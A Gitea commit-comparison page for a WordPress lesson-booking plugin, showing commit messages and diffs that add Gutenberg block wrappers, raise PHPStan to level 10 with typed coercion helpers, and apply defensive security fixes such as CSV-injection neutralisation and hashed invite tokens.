Unsupervised/unsupervised-scheduler
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

base: Unsupervised/unsupervised-scheduler:5140e76347b4aa861ee6bfca2692ffd2ec4e3143
Branches Tags
Unsupervised/unsupervised-scheduler:main
..
compare: Unsupervised/unsupervised-scheduler:main
Branches Tags
Unsupervised/unsupervised-scheduler:main

9 Commits
5140e76347 .. main

Author SHA1 Message Date
thatguygriff aea731c2f8 Merge pull request 'Upgrade PHPStan to 2.x and raise analysis level from 6 to 10' (#46) from chore/phpstan-2-upgrade into main
CI / No Debug Code (push) Successful in 3s
Details
CI / Tests (PHP 8.1) (push) Successful in 45s
Details
CI / Tests (PHP 8.2) (push) Successful in 52s
Details
CI / Tests (PHP 8.3) (push) Successful in 56s
Details
CI / PHPStan (push) Successful in 1m2s
Details
CI / Coding Standards (push) Successful in 1m5s
Details
CI / Build Plugin Zip (push) Successful in 56s
Details 
Reviewed-on: #46
 2026-06-12 16:54:57 +00:00
thatguygriff 1d6ac46ba3 Upgrade PHPStan to 2.x and raise analysis level from 6 to 10
CI / No Debug Code (pull_request) Successful in 3s
Details
CI / Tests (PHP 8.2) (pull_request) Successful in 48s
Details
CI / Tests (PHP 8.3) (pull_request) Successful in 52s
Details
CI / Coding Standards (pull_request) Successful in 57s
Details
CI / Tests (PHP 8.1) (pull_request) Successful in 1m1s
Details
CI / PHPStan (pull_request) Successful in 1m11s
Details
CI / Build Plugin Zip (pull_request) Has been skipped
Details 
- Bump phpstan/phpstan ^2.0 and szepeviktor/phpstan-wordpress ^2.0
- Move the analysis level into phpstan.neon (single source) and raise it to 10
- Add Val, a runtime coercion helper that narrows untyped WordPress boundary
  values (wpdb rows, REST params, superglobals, options) with explicit checks
  instead of blind casts, plus unit tests
- Type value-object fromRow() params as stdClass (what wpdb returns) and map
  columns through Val so unexpected shapes degrade safely
- Use %i identifier placeholders for table names in all wpdb::prepare() calls
  so every query string is a literal and identifiers are escaped by WordPress;
  raises the minimum WordPress version to 6.2 where %i was introduced
- Guard wpdb::prepare() null result before wpdb::query() in updateTax()
- Fix nullable get_permalink()/strtotime() handling, list types at REST and
  capability call sites, dead null-coalescing on checked superglobals, and
  narrow get_users() results before mapping
- Register Val method names with the ValidatedSanitizedInput sniff so it
  validates the real sanitizer around each superglobal read
- Update repository unit tests for the %i placeholder arguments

Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
 2026-06-12 13:42:50 -03:00
thatguygriff b23508f726 Merge pull request 'Gutenberg dynamic-block wrappers for shortcodes with editor previews' (#45) from feature/editor-blocks into main
CI / No Debug Code (push) Successful in 3s
Details
CI / Tests (PHP 8.2) (push) Successful in 54s
Details
CI / Tests (PHP 8.1) (push) Successful in 54s
Details
CI / Tests (PHP 8.3) (push) Successful in 1m6s
Details
CI / Coding Standards (push) Successful in 1m12s
Details
CI / PHPStan (push) Successful in 1m12s
Details
CI / Build Plugin Zip (push) Successful in 1m27s
Details 
Reviewed-on: #45
 2026-06-12 15:14:02 +00:00
thatguygriff fc70cde9d5 Add Gutenberg dynamic-block wrappers for the front-end shortcodes
CI / No Debug Code (pull_request) Successful in 4s
Details
CI / Tests (PHP 8.2) (pull_request) Successful in 52s
Details
CI / Tests (PHP 8.1) (pull_request) Successful in 54s
Details
CI / Tests (PHP 8.3) (pull_request) Successful in 1m29s
Details
CI / Coding Standards (pull_request) Successful in 1m57s
Details
CI / PHPStan (pull_request) Successful in 2m14s
Details
CI / Build Plugin Zip (pull_request) Has been skipped
Details 
Wrap the four shortcodes (us_booking, us_student_login,
us_student_register, us_group_classes) in dynamic blocks so pages can be
previewed and styled in the block editor. Front-end rendering delegates
to the same page objects the shortcodes use; in the editor's
block-renderer REST preview a static, script-free BlockPreview is
rendered instead (no live REST calls, redirects, or Stripe.js). The
editor script (vanilla JS, no build step) registers each block with
wp.serverSideRender previews and shortcode transforms; frontend.css is
attached as the block style so previews pick up theme styling.

Resolves #44

Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
 2026-06-12 12:03:27 -03:00
thatguygriff 63e2fbcc5b Merge pull request 'Security fixes: CSV injection, policy body output, invite token hashing, slot datetime validation' (#43) from feature/security-review-fixes into main
CI / No Debug Code (push) Successful in 3s
Details
CI / Tests (PHP 8.2) (push) Successful in 45s
Details
CI / Tests (PHP 8.1) (push) Successful in 50s
Details
CI / Tests (PHP 8.3) (push) Successful in 54s
Details
CI / Coding Standards (push) Successful in 1m1s
Details
CI / PHPStan (push) Successful in 1m9s
Details
CI / Build Plugin Zip (push) Successful in 1m6s
Details 
Reviewed-on: #43
 2026-06-10 19:51:20 +00:00
thatguygriff f3f5c7801f Security fixes: CSV injection, policy body output, invite hashing, slot datetimes
CI / No Debug Code (pull_request) Successful in 3s
Details
CI / Tests (PHP 8.1) (pull_request) Successful in 43s
Details
CI / Tests (PHP 8.3) (pull_request) Successful in 49s
Details
CI / Tests (PHP 8.2) (pull_request) Successful in 59s
Details
CI / Coding Standards (pull_request) Successful in 1m11s
Details
CI / PHPStan (pull_request) Successful in 1m20s
Details
CI / Build Plugin Zip (pull_request) Has been skipped
Details 
Four fixes from a security review pass:

- Neutralise CSV formula injection in the payments export: fields with a
  leading =, +, -, @, tab, or CR (e.g. a hostile student display name) are
  apostrophe-prefixed in PaymentReport::csvLine() so they open as text in
  Excel/Google Sheets. Fixes #39.
- Sanitise policy bodies with wp_kses_post at output in
  PolicyEndpoint::index() (the booking JS renders that HTML raw), so a
  future write path that forgets kses can never become stored XSS.
  Fixes #40.
- Store invite tokens hashed (SHA-256) at rest: a database leak can no
  longer redeem pending invites. The registration link is shown once, at
  creation; the pending list shows email/invited date; lookups hash the
  submitted token. Existing plaintext pending invites must be re-issued.
  Fixes #41.
- Validate availability slot datetimes on both creation paths (REST and
  admin form) via AvailabilitySlot::normalizeDateTime(): canonical and
  datetime-local forms normalise to Y-m-d H:i:s, garbage and end <= start
  are rejected (REST 400) instead of reaching the DATETIME column or
  throwing inside the weekly-series date arithmetic. Fixes #42.

composer test (204 tests, 594 assertions), PHPStan L6, and PHPCS all green.

Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
 2026-06-10 16:36:26 -03:00
thatguygriff 693246c1c1 Merge pull request 'Security hardening: booking auth, offering exposure, payments, invites (#31–#37)' (#38) from feature/security-fixes into main
CI / No Debug Code (push) Successful in 3s
Details
CI / Tests (PHP 8.1) (push) Successful in 47s
Details
CI / Tests (PHP 8.2) (push) Successful in 51s
Details
CI / Coding Standards (push) Successful in 58s
Details
CI / PHPStan (push) Successful in 1m2s
Details
CI / Tests (PHP 8.3) (push) Successful in 1m41s
Details
CI / Build Plugin Zip (push) Successful in 55s
Details 
Reviewed-on: #38
 2026-06-09 20:11:34 +00:00
thatguygriff 061d09e034 Harden booking, offering exposure, payments, and invites
CI / No Debug Code (pull_request) Successful in 3s
Details
CI / Tests (PHP 8.1) (pull_request) Successful in 49s
Details
CI / Coding Standards (pull_request) Successful in 55s
Details
CI / PHPStan (pull_request) Successful in 1m7s
Details
CI / Tests (PHP 8.3) (pull_request) Successful in 1m41s
Details
CI / Tests (PHP 8.2) (pull_request) Successful in 44s
Details
CI / Build Plugin Zip (pull_request) Has been skipped
Details 
Security fixes from a pen-test review (issues #31–#37):

- #31 Booking no longer trusts a client-supplied offering_id: a slot-tied
  offering is authoritative and any offering used must belong to the slot's
  instructor, closing a free/misrouted-payment bypass.
- #34 Availability slot creation rejects an offering the instructor does not
  own (AvailabilityEndpoint now takes OfferingRepository).
- #32 Offering/question/policy listing endpoints now require book_lesson
  instead of being public (no anonymous consumer exists); Offering::toArray
  also omits etransfer_email from listings as defense-in-depth.
- #33 Slots are claimed atomically (UPDATE ... WHERE is_booked = 0) before a
  lesson is inserted, preventing a double-booking race.
- #35 A single weekly booking is capped (MAX_WEEKLY_OCCURRENCES) and only
  creates lessons for slots it actually claimed.
- #36 Stripe secret/webhook keys are write-only in the settings UI and a blank
  submit keeps the stored value; secrets are never echoed back into HTML.
- #37 Pending invites expire after 14 days (Invite::isAcceptable), enforced at
  registration and surfaced on the admin invites list.

Adds BookingEndpointTest plus Invite/Offering/AvailabilityRepository coverage
and minimal WP_REST_Request/WP_REST_Response stubs. composer test (200),
lint, and cs all green.

Co-Authored-By: Claude Opus 4.8 <noreply@anthropic.com>
 2026-06-09 17:08:22 -03:00
thatguygriff fe43f91fb1 Merge pull request 'Add Instructors admin page (create + per-capability access)' (#30) from feature/instructor-management into main
CI / No Debug Code (push) Successful in 3s
Details
CI / Tests (PHP 8.3) (push) Successful in 45s
Details
CI / Tests (PHP 8.1) (push) Successful in 47s
Details
CI / Tests (PHP 8.2) (push) Successful in 50s
Details
CI / Coding Standards (push) Successful in 54s
Details
CI / PHPStan (push) Successful in 1m5s
Details
CI / Build Plugin Zip (push) Successful in 50s
Details 
Reviewed-on: #30
 2026-06-08 20:05:33 +00:00
84 changed files with 1446 additions and 407 deletions
Expand all files Collapse all files
CLAUDE.md
+6 -1
View File
@@ -38,6 +38,8 @@ src/ — All plugin PHP (PSR-4 namespace: Unsupervised\Schedula
AdminMenu.php — Registers wp-admin menu pages
RestRegistrar.php — Registers all REST routes under us-scheduler/v1
ShortcodeRegistrar.php — Registers [us_booking] and [us_student_login] shortcodes
BlockRegistrar.php — Registers Gutenberg dynamic-block wrappers for the shortcodes
BlockPreview.php — Static editor-preview markup for the blocks
templates/ — PHP view files included by controllers/shortcodes
assets/ — CSS and JS (vanilla JS, no build step)
tests/Unit/ — PHPUnit unit tests (PSR-4: Unsupervised\Schedular\Tests\)
@@ -66,6 +68,9 @@ All database access goes through repository classes within their domain package.
| `AdminMenu` | Registers wp-admin menu pages |
| `RestRegistrar` | Registers all REST routes under `us-scheduler/v1` |
| `ShortcodeRegistrar` | Registers `[us_booking]` and `[us_student_login]` shortcodes |
| `BlockRegistrar` | Registers Gutenberg dynamic-block wrappers for the shortcodes |
| `BlockPreview` | Static editor-preview markup for the blocks |
| `Val` | Runtime coercion of untyped WP boundary values (wpdb rows, REST params, superglobals) |
| `Auth\RoleManager` | Registers `us_instructor` and `us_student` roles with custom caps |
| `Auth\LoginPage` | Renders front-end student login form |
| `Availability\AvailabilitySlot` | Immutable value object for a slot row |
@@ -104,6 +109,6 @@ All test classes extend `tests/Unit/TestCase.php`, which handles `Monkey\setUp()
### CI
Gitea Actions (`.gitea/workflows/ci.yml`) runs on every push and pull request:
- **lint** — PHPCS WordPress coding standards
- **static-analysis** — PHPStan level 6
- **static-analysis** — PHPStan level 10
- **test** — PHPUnit on PHP 8.1, 8.2, 8.3
- **no-debug** — rejects commits with `var_dump`, `error_log`, etc. in `src/`
assets/css/frontend.css
+7
View File
@@ -33,3 +33,10 @@
color: #c00;
margin-top: 8px;
}
/* Shown only in block-editor previews (see BlockPreview). */
.us-editor-note {
font-size: 0.85em;
font-style: italic;
opacity: 0.7;
}
assets/js/blocks.js
+65
View File
@@ -0,0 +1,65 @@
/* global wp */
(function () {
'use strict';
const { registerBlockType } = wp.blocks;
const { createElement: el } = wp.element;
const { useBlockProps } = wp.blockEditor;
const ServerSideRender = wp.serverSideRender;
const { __ } = wp.i18n;
const blocks = [
{
name: 'us-scheduler/booking',
title: __('Lesson Booking', 'unsupervised-schedular'),
description: __('Lets students browse availability and book lessons. Shows a styled preview in the editor.', 'unsupervised-schedular'),
icon: 'calendar-alt',
keywords: ['booking', 'lesson', 'schedule'],
shortcode: 'us_booking',
},
{
name: 'us-scheduler/student-login',
title: __('Student Login', 'unsupervised-schedular'),
description: __('The front-end login form for students.', 'unsupervised-schedular'),
icon: 'admin-users',
keywords: ['login', 'student', 'sign in'],
shortcode: 'us_student_login',
},
{
name: 'us-scheduler/student-register',
title: __('Student Registration', 'unsupervised-schedular'),
description: __('The invite-only student registration form.', 'unsupervised-schedular'),
icon: 'welcome-add-page',
keywords: ['register', 'student', 'invite'],
shortcode: 'us_student_register',
},
{
name: 'us-scheduler/group-classes',
title: __('Group Classes', 'unsupervised-schedular'),
description: __('Lets students browse and enrol in group classes. Shows a styled preview in the editor.', 'unsupervised-schedular'),
icon: 'groups',
keywords: ['group', 'class', 'enrol'],
shortcode: 'us_group_classes',
},
];
blocks.forEach((def) => {
registerBlockType(def.name, {
apiVersion: 3,
title: def.title,
description: def.description,
icon: def.icon,
category: 'widgets',
keywords: def.keywords,
supports: { html: false, multiple: false },
example: {},
edit: function Edit() {
return el('div', useBlockProps(), el(ServerSideRender, { block: def.name }));
},
save: () => null,
transforms: {
from: [{ type: 'shortcode', tag: def.shortcode }],
},
});
});
}());
composer.json
+3 -3
View File
@@ -11,8 +11,8 @@
"phpunit/phpunit": "^10.5",
"brain/monkey": "^2.6",
"mockery/mockery": "^1.6",
"phpstan/phpstan": "^1.10",
"szepeviktor/phpstan-wordpress": "^1.3",
"phpstan/phpstan": "^2.0",
"szepeviktor/phpstan-wordpress": "^2.0",
"php-stubs/wordpress-stubs": "^6.0",
"squizlabs/php_codesniffer": "^3.7",
"wp-coding-standards/wpcs": "^3.0"
@@ -30,7 +30,7 @@
"scripts": {
"test": "phpunit --configuration phpunit.xml",
"test:coverage": "phpunit --configuration phpunit.xml --coverage-html coverage/",
"lint": "phpstan analyse src/ --level=6 --configuration phpstan.neon --memory-limit=1G",
"lint": "phpstan analyse --configuration phpstan.neon --memory-limit=1G",
"cs": "phpcs --standard=phpcs.xml.dist",
"cs:fix": "phpcbf --standard=phpcs.xml.dist",
"build": "bash bin/build-zip.sh"
docs/features/account-registration.md
+6 -6
View File
@@ -18,7 +18,7 @@ Stored in the `us_registration_mode` option (default `invite`):
|--------------------|------------------|--------------------------------------------------------|
| `id` | BIGINT UNSIGNED | Primary key |
| `email` | VARCHAR(191) | Invited email address |
| `token` | VARCHAR(64) | Opaque token embedded in the registration link |
| `token` | VARCHAR(64) | SHA-256 hash of the token embedded in the registration link (raw token is never stored) |
| `role` | VARCHAR(32) | Role granted on acceptance (default `us_student`) |
| `status` | VARCHAR(20) | `pending` / `accepted` / `revoked` |
| `invited_by` | BIGINT UNSIGNED | WordPress user ID of the studio admin who invited |
@@ -34,16 +34,16 @@ recorded in `us_policy_acceptances` with `registration_type = account` and
`registration_id = <new user ID>`.
## Flow (invite mode)
1. Studio admin opens **Invites** (`manage_students`) and invites an email; an invite row is created with a token and a registration link.
2. The invitee opens `[us_student_register]` with the token (`?us_invite=<token>`).
1. Studio admin opens **Invites** (`manage_students`) and invites an email; an invite row is created storing the token's SHA-256 hash, and the registration link (with the raw token) is shown **once** in a notice. To re-send a lost link, revoke and re-invite.
2. The invitee opens `[us_student_register]` with the token (`?us_invite=<token>`); the lookup hashes the submitted token and matches it against the stored hash.
3. The form pre-fills the email and collects a display name and password, and renders the signup-scoped published policies, each with a required acceptance checkbox.
4. On submit, the token is re-validated; a `us_student` user is created, the policy acceptances are recorded (`account` type), the invite is marked `accepted`, and the user is logged in.
4. On submit, the token is re-validated (hashed lookup); a `us_student` user is created, the policy acceptances are recorded (`account` type), the invite is marked `accepted`, and the user is logged in.
## Admin Interface
**Invites** in wp-admin (`manage_students`, studio admin only):
- Select the **registration page** (the page hosting `[us_student_register]`), stored in the `us_registration_page_id` option; invitation links point there (falling back to the home page if unset)
- Invite an email (creates a pending invite + link)
- List pending invites; revoke an invite
- Invite an email (creates a pending invite; the link is displayed once, at creation only)
- List pending invites (email + invited date); revoke an invite
## Frontend Shortcode
- `[us_student_register]` — the registration page. Shows the form for a valid pending invite; otherwise shows an "by invitation only" message (in `invite` mode).
docs/features/availability-management.md
+6
View File
@@ -46,6 +46,12 @@ offering/duration before selecting a slot to register for.
`GET` supports query params: `instructor_id`, `offering_id`, `duration_minutes`, `from` (datetime), `to` (datetime).
`POST` validates `start_dt`/`end_dt` (admin form and REST alike) via
`AvailabilitySlot::normalizeDateTime()`: the canonical `Y-m-d H:i[:s]` and HTML
`datetime-local` (`Y-m-d\TH:i[:s]`) forms are normalised to `Y-m-d H:i:s`;
anything else — or an end not after the start — is rejected (REST responds
`400 invalid_datetime`; the admin form is a no-op).
## Implementation
- Repository: `Unsupervised\Schedular\Availability\AvailabilityRepository`
- Model: `Unsupervised\Schedular\Availability\AvailabilitySlot`
docs/features/editor-blocks.md
+66
View File
@@ -0,0 +1,66 @@
# Editor Blocks
Gutenberg dynamic-block wrappers for the plugin's four front-end shortcodes,
so the pages can be previewed and styled inside the block editor instead of
appearing as grey shortcode text.
## Blocks
| Block | Wraps shortcode | Front-end renderer |
|---|---|---|
| `us-scheduler/booking` | `[us_booking]` | `Booking\BookingPage::render()` |
| `us-scheduler/student-login` | `[us_student_login]` | `Auth\LoginPage::render()` |
| `us-scheduler/student-register` | `[us_student_register]` | `Auth\RegistrationPage::render()` |
| `us-scheduler/group-classes` | `[us_group_classes]` | `GroupClass\GroupClassPage::render()` |
The shortcodes remain registered for back-compat; blocks and shortcodes share
the same page objects (constructed once in `Plugin::boot()`), so front-end
output is identical either way. Pasting a shortcode into the block editor
auto-converts it to the matching block via a `transforms.from` shortcode
transform.
## How it works
- **`BlockRegistrar`** (`src/BlockRegistrar.php`) hooks `init` and registers
each block with `register_block_type()`: a `render_callback` per block, the
shared editor script (`assets/js/blocks.js`, handle
`us-scheduler-blocks`), and the front-end stylesheet
(`assets/css/frontend.css`, handle `us-scheduler`) as the block `style` so
it also loads inside the editor and previews pick up theme styling.
- **`assets/js/blocks.js`** (vanilla JS, no build step) registers the client
side of each block — title, icon, keywords, shortcode transform — and
renders the editor preview with `wp.serverSideRender`, which fetches the
server-rendered markup via the `/wp/v2/block-renderer` REST route.
- **`BlockPreview`** (`src/BlockPreview.php`) supplies static, script-free
markup for editor previews. `BlockRegistrar::isEditorPreview()` detects the
block-renderer context via the `REST_REQUEST` constant (front-end template
rendering never happens inside a REST request) and renders the preview
instead of the live page.
## Editor preview behaviour
Live pages cannot run in the editor: booking and group classes are populated
by JavaScript making authenticated REST calls (and may load Stripe.js),
registration requires a valid invite token, and login short-circuits for
logged-in users (the editing admin always is). Each preview therefore
reproduces the live wrapper elements and CSS classes with representative
placeholder content:
- **Booking** — `#us-booking-app` with sample `.us-day` / `.us-slot` rows and
disabled Book buttons.
- **Group classes** — `#us-group-app` with a sample `.us-class` card and a
disabled Enrol button.
- **Login** — the real `templates/frontend/login-page.php` template (it has
no request-state dependencies).
- **Registration** — a disabled sample of the `.us-register-form` fields.
Each preview starts with a `.us-editor-note` paragraph explaining what the
published page shows instead. The note class only appears in editor previews.
## Tests
- `tests/Unit/BlockRegistrarTest.php` — hook registration, block/asset
registration, front-end delegation to the page objects, preview-mode
routing.
- `tests/Unit/BlockPreviewTest.php` — preview markup mirrors the live CSS
classes/ids and includes the editor note.
docs/features/payment-reporting.md
+5
View File
@@ -54,6 +54,11 @@ and `instructor_id` query params as the page and returns `text/csv` with a
`Content-Disposition: attachment` header. Instructor requests are scoped to
their own rows regardless of `instructor_id`.
Fields that a spreadsheet would interpret as a formula (leading `=`, `+`, `-`,
`@`, tab, or CR — e.g. a hostile student display name) are prefixed with an
apostrophe so the export can never carry CSV formula injection into Excel or
Google Sheets.
## Implementation
- Report aggregator (pure totals + CSV): `Unsupervised\Schedular\Payment\PaymentReport`
phpcs.xml.dist
+26 -1
View File
@@ -44,7 +44,32 @@
</properties>
</rule>
<!--
Val::* type-narrowing helpers (src/Val.php) wrap superglobal reads so
PHPStan level 10 sees a typed value, e.g.
`absint( Val::int( $_GET['id'] ?? 0 ) )`. The sniff walks wrapping
calls innermost-out and aborts at the first unrecognised function
name, so the Val method names must be registered for it to look past
them. Because they are static calls (`::`), the sniff never credits
them as sanitizers themselves — it skips them and still requires a
real sanitizing function around the read.
-->
<rule ref="WordPress.Security.ValidatedSanitizedInput">
<properties>
<property name="customUnslashingSanitizingFunctions" type="array">
<element value="int"/>
<element value="intOrNull"/>
<element value="float"/>
<element value="bool"/>
</property>
<property name="customSanitizingFunctions" type="array">
<element value="string"/>
<element value="stringOrNull"/>
</property>
</properties>
</rule>
<!-- PHP 8.1+ minimum — allow modern syntax. -->
<config name="minimum_supported_wp_version" value="6.0"/>
<config name="minimum_supported_wp_version" value="6.2"/>
<config name="testVersion" value="8.1-"/>
</ruleset>
phpstan.neon
+1 -1
View File
@@ -2,7 +2,7 @@ includes:
- vendor/szepeviktor/phpstan-wordpress/extension.neon
parameters:
level: 6
level: 10
paths:
- src
bootstrapFiles:
src/Auth/AccessSettings.php
+3 -1
View File
@@ -3,6 +3,8 @@ declare(strict_types=1);
namespace Unsupervised\Schedular\Auth;
use Unsupervised\Schedular\Val;
/**
* Site-owner toggles for whether WordPress administrators automatically receive
* the studio-admin and/or instructor capabilities.
@@ -39,7 +41,7 @@ class AccessSettings {
* single-account behaviour.
*/
private function flag( string $option ): bool {
return '0' !== (string) get_option( $option, '1' );
return '0' !== Val::string( get_option( $option, '1' ) );
}
public function renderPage(): void {
src/Auth/InstructorController.php
+12 -6
View File
@@ -3,6 +3,8 @@ declare(strict_types=1);
namespace Unsupervised\Schedular\Auth;
use Unsupervised\Schedular\Val;
/**
* Studio-admin **Instructors** page: create instructor accounts and toggle each
* instructor's managed capabilities. Gated on `manage_instructors`. A studio
@@ -24,7 +26,7 @@ class InstructorController {
}
// phpcs:ignore WordPress.Security.NonceVerification.Recommended -- read-only instructor selector.
$instructorId = absint( $_GET['instructor_id'] ?? 0 );
$instructorId = absint( Val::int( $_GET['instructor_id'] ?? 0 ) );
$instructor = $instructorId > 0 ? get_userdata( $instructorId ) : false;
if ( $instructor && in_array( RoleManager::INSTRUCTOR, (array) $instructor->roles, true ) ) {
@@ -50,12 +52,15 @@ class InstructorController {
'email' => $user->user_email,
'registered' => $user->user_registered,
],
array_filter(
get_users(
[
'role' => RoleManager::INSTRUCTOR,
'orderby' => 'display_name',
'order' => 'ASC',
]
),
static fn( mixed $user ): bool => $user instanceof \WP_User
)
);
@@ -66,7 +71,7 @@ class InstructorController {
private function handleFormAction(): string {
// Nonce is verified by the caller (renderPage) before this method runs.
// phpcs:disable WordPress.Security.NonceVerification.Missing
$action = sanitize_key( wp_unslash( $_POST['usc_action'] ?? '' ) );
$action = sanitize_key( Val::string( wp_unslash( $_POST['usc_action'] ?? '' ) ) );
// phpcs:enable WordPress.Security.NonceVerification.Missing
if ( 'create' === $action ) {
@@ -82,8 +87,8 @@ class InstructorController {
private function createInstructor(): string {
// phpcs:disable WordPress.Security.NonceVerification.Missing
$email = sanitize_email( wp_unslash( $_POST['email'] ?? '' ) );
$name = sanitize_text_field( wp_unslash( $_POST['display_name'] ?? '' ) );
$email = sanitize_email( Val::string( wp_unslash( $_POST['email'] ?? '' ) ) );
$name = sanitize_text_field( Val::string( wp_unslash( $_POST['display_name'] ?? '' ) ) );
// phpcs:enable WordPress.Security.NonceVerification.Missing
if ( ! is_email( $email ) ) {
@@ -125,8 +130,9 @@ class InstructorController {
private function updateCaps(): string {
// phpcs:disable WordPress.Security.NonceVerification.Missing
$instructorId = absint( $_POST['instructor_id'] ?? 0 );
$submitted = array_map( 'sanitize_key', (array) wp_unslash( $_POST['capabilities'] ?? [] ) );
$instructorId = absint( Val::int( $_POST['instructor_id'] ?? 0 ) );
// phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotSanitized -- each capability key is sanitized with sanitize_key() in the array_map callback.
$submitted = array_values( array_map( static fn( mixed $cap ): string => sanitize_key( Val::string( $cap ) ), (array) wp_unslash( $_POST['capabilities'] ?? [] ) ) );
// phpcs:enable WordPress.Security.NonceVerification.Missing
$instructor = $instructorId > 0 ? get_userdata( $instructorId ) : false;
src/Auth/Invite.php
+22 -10
View File
@@ -3,6 +3,8 @@ declare(strict_types=1);
namespace Unsupervised\Schedular\Auth;
use Unsupervised\Schedular\Val;
class Invite {
public const STATUS_PENDING = 'pending';
@@ -22,6 +24,16 @@ class Invite {
*/
public const EXPIRY_DAYS = 14;
/**
* Hash a raw invitation token for storage and lookup. Only the hash is
* persisted, so a database leak (backup, SQL injection elsewhere) cannot be
* used to redeem pending invites; the raw token exists only in the emailed
* link and is shown to the admin once, at creation.
*/
public static function hashToken( string $rawToken ): string {
return hash( 'sha256', $rawToken );
}
public function __construct(
public readonly string $email,
public readonly string $token,
@@ -34,17 +46,17 @@ class Invite {
public readonly ?int $id = null,
) {}
public static function fromRow( object $row ): self {
public static function fromRow( \stdClass $row ): self {
return new self(
email: $row->email,
token: $row->token,
role: $row->role,
status: $row->status,
invitedBy: null !== $row->invited_by ? (int) $row->invited_by : null,
acceptedUserId: null !== $row->accepted_user_id ? (int) $row->accepted_user_id : null,
acceptedAt: $row->accepted_at,
createdAt: $row->created_at ?? null,
id: (int) $row->id,
email: Val::string( $row->email ),
token: Val::string( $row->token ),
role: Val::string( $row->role ),
status: Val::string( $row->status ),
invitedBy: Val::intOrNull( $row->invited_by ),
acceptedUserId: Val::intOrNull( $row->accepted_user_id ),
acceptedAt: Val::stringOrNull( $row->accepted_at ),
createdAt: Val::stringOrNull( $row->created_at ?? null ),
id: Val::int( $row->id ),
);
}
src/Auth/InviteRepository.php
+6 -4
View File
@@ -32,7 +32,7 @@ class InviteRepository {
public function findByToken( string $token ): ?Invite {
$row = $this->db->get_row(
$this->db->prepare( "SELECT * FROM {$this->table} WHERE token = %s", $token )
$this->db->prepare( 'SELECT * FROM %i WHERE token = %s', $this->table, $token )
);
return $row ? Invite::fromRow( $row ) : null;
@@ -40,7 +40,7 @@ class InviteRepository {
public function findById( int $id ): ?Invite {
$row = $this->db->get_row(
$this->db->prepare( "SELECT * FROM {$this->table} WHERE id = %d", $id )
$this->db->prepare( 'SELECT * FROM %i WHERE id = %d', $this->table, $id )
);
return $row ? Invite::fromRow( $row ) : null;
@@ -52,7 +52,8 @@ class InviteRepository {
public function findPendingByEmail( string $email ): ?Invite {
$row = $this->db->get_row(
$this->db->prepare(
"SELECT * FROM {$this->table} WHERE email = %s AND status = %s ORDER BY id DESC LIMIT 1",
'SELECT * FROM %i WHERE email = %s AND status = %s ORDER BY id DESC LIMIT 1',
$this->table,
$email,
Invite::STATUS_PENDING
)
@@ -69,7 +70,8 @@ class InviteRepository {
public function findPending(): array {
$rows = $this->db->get_results(
$this->db->prepare(
"SELECT * FROM {$this->table} WHERE status = %s ORDER BY created_at DESC",
'SELECT * FROM %i WHERE status = %s ORDER BY created_at DESC',
$this->table,
Invite::STATUS_PENDING
)
);
src/Auth/LoginPage.php
+5 -3
View File
@@ -3,12 +3,14 @@ declare(strict_types=1);
namespace Unsupervised\Schedular\Auth;
use Unsupervised\Schedular\Val;
class LoginPage {
/**
* Renders the student login shortcode output.
*
* @param array<string, string> $atts Shortcode attributes (unused — reserved for future options).
* @param array<string> $atts Shortcode attributes (unused — reserved for future options).
*/
public function render( array $atts ): string { // phpcs:ignore Generic.CodeAnalysis.UnusedFunctionParameter.Found
if ( is_user_logged_in() ) {
@@ -26,9 +28,9 @@ class LoginPage {
if ( isset( $_POST['us_login'] ) && check_admin_referer( 'us_student_login' ) ) {
$credentials = [
'user_login' => sanitize_user( wp_unslash( $_POST['log'] ?? '' ) ),
'user_login' => sanitize_user( Val::string( wp_unslash( $_POST['log'] ?? '' ) ) ),
// phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotSanitized -- passwords must not be sanitized.
'user_password' => wp_unslash( $_POST['pwd'] ?? '' ),
'user_password' => Val::string( wp_unslash( $_POST['pwd'] ?? '' ) ),
'remember' => isset( $_POST['rememberme'] ),
];
src/Auth/RegistrationController.php
+32 -8
View File
@@ -3,6 +3,8 @@ declare(strict_types=1);
namespace Unsupervised\Schedular\Auth;
use Unsupervised\Schedular\Val;
class RegistrationController {
/**
@@ -17,50 +19,72 @@ class RegistrationController {
wp_die( esc_html__( 'You do not have permission to manage invites.', 'unsupervised-schedular' ) );
}
$newInviteUrl = '';
if ( isset( $_POST['usc_action'] ) && check_admin_referer( 'usc_invite_action' ) ) {
$this->handleFormAction();
$newInviteUrl = $this->handleFormAction();
}
$pendingInvites = $this->invites->findPending();
$registrationPageId = (int) get_option( self::OPTION_PAGE, 0 );
$registrationPageId = Val::int( get_option( self::OPTION_PAGE, 0 ) );
$registrationPageUrl = $registrationPageId > 0 ? (string) get_permalink( $registrationPageId ) : '';
include USC_PLUGIN_DIR . 'templates/admin/invites.php';
}
private function handleFormAction(): void {
/**
* Handle a posted admin action. Returns the registration link for a freshly
* created invite — the only time it can be shown, since just the token's hash
* is stored — or an empty string for every other action.
*/
private function handleFormAction(): string {
// Nonce is verified by the caller (renderPage) before this method runs.
// phpcs:disable WordPress.Security.NonceVerification.Missing
$action = sanitize_key( wp_unslash( $_POST['usc_action'] ?? '' ) );
$action = sanitize_key( Val::string( wp_unslash( $_POST['usc_action'] ?? '' ) ) );
if ( 'set_page' === $action ) {
update_option( self::OPTION_PAGE, absint( $_POST['registration_page_id'] ?? 0 ) );
update_option( self::OPTION_PAGE, absint( Val::int( $_POST['registration_page_id'] ?? 0 ) ) );
}
if ( 'invite' === $action ) {
$email = sanitize_email( wp_unslash( $_POST['email'] ?? '' ) );
$email = sanitize_email( Val::string( wp_unslash( $_POST['email'] ?? '' ) ) );
if (
is_email( $email )
&& false === email_exists( $email )
&& null === $this->invites->findPendingByEmail( $email )
) {
$rawToken = wp_generate_password( 32, false );
$this->invites->insert(
new Invite(
email: $email,
token: wp_generate_password( 32, false ),
token: Invite::hashToken( $rawToken ),
invitedBy: get_current_user_id(),
)
);
return $this->registrationLink( $rawToken );
}
}
if ( 'revoke' === $action ) {
$inviteId = absint( $_POST['invite_id'] ?? 0 );
$inviteId = absint( Val::int( $_POST['invite_id'] ?? 0 ) );
if ( $inviteId > 0 ) {
$this->invites->revoke( $inviteId );
}
}
// phpcs:enable WordPress.Security.NonceVerification.Missing
